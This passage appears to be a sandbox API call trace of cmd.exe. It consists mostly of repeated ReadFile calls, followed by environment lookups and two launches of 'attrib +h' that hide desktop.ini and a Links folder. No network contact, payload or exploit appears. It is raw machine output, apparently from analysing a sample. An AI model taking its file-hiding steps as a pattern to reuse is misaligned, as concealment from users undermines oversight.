lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 
[0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, 
lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, 
lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: 
lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, 
lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.195] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.196] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0211.233] _close (_FileHandle=3) returned 0 [0211.233] GetConsoleTitleW (in: lpConsoleTitle=0x2af620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.234] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.234] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.234] GetEnvironmentVariableW (in: lpName="PATHEXT", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.234] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.234] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.234] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.234] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.234] GetConsoleTitleW (in: lpConsoleTitle=0x2af3b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.234] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af23c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af304 | out: lpAttributeList=0x2af23c, lpSize=0x2af304) returned 1 [0211.234] UpdateProcThreadAttribute (in: lpAttributeList=0x2af23c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af23c, lpPreviousValue=0x0) returned 1 [0211.235] GetStartupInfoW (in: lpStartupInfo=0x2af1f8 | out: lpStartupInfo=0x2af1f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0211.235] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.235] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af298*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af2e4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessInformation=0x2af2e4*(hProcess=0x4c, hThread=0x50, dwProcessId=0x9d8, dwThreadId=0x5dc)) returned 1 [0211.236] CloseHandle (hObject=0x50) returned 1 [0211.236] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.236] GetEnvironmentStringsW () returned 0x472cc0* [0211.236] FreeEnvironmentStringsW (penv=0x472cc0) returned 1 [0211.236] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0211.432] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af1d8 | out: lpExitCode=0x2af1d8*=0x0) returned 1 [0211.432] CloseHandle (hObject=0x4c) returned 1 [0211.432] _vsnwprintf (in: _Buffer=0x2af320, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af1e4 | out: _Buffer="00000000") returned 8 [0211.432] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.432] GetEnvironmentStringsW () returned 0x472cc0* [0211.432] FreeEnvironmentStringsW (penv=0x472cc0) returned 1 [0211.432] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.432] GetEnvironmentStringsW () returned 0x472cc0* [0211.432] FreeEnvironmentStringsW (penv=0x472cc0) returned 1 [0211.432] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af23c | out: lpAttributeList=0x2af23c) [0211.432] GetConsoleTitleW (in: lpConsoleTitle=0x2af620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.433] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.433] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.433] 
GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.433] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.433] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.433] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.433] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.433] GetConsoleTitleW (in: lpConsoleTitle=0x2af3b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.433] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af23c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af304 | out: lpAttributeList=0x2af23c, lpSize=0x2af304) returned 1 [0211.433] UpdateProcThreadAttribute (in: lpAttributeList=0x2af23c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af23c, lpPreviousValue=0x0) returned 1 [0211.433] GetStartupInfoW (in: lpStartupInfo=0x2af1f8 | out: lpStartupInfo=0x2af1f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0211.433] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.433] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af298*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", dwX=0x0, dwY=0x1, 
dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af2e4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessInformation=0x2af2e4*(hProcess=0x50, hThread=0x4c, dwProcessId=0x808, dwThreadId=0x7d0)) returned 1 [0211.435] CloseHandle (hObject=0x4c) returned 1 [0211.435] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.435] GetEnvironmentStringsW () returned 0x473790* [0211.436] FreeEnvironmentStringsW (penv=0x473790) returned 1 [0211.436] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0211.678] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af1d8 | out: lpExitCode=0x2af1d8*=0x0) returned 1 [0211.678] CloseHandle (hObject=0x50) returned 1 [0211.678] _vsnwprintf (in: _Buffer=0x2af320, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af1e4 | out: _Buffer="00000000") returned 8 [0211.678] 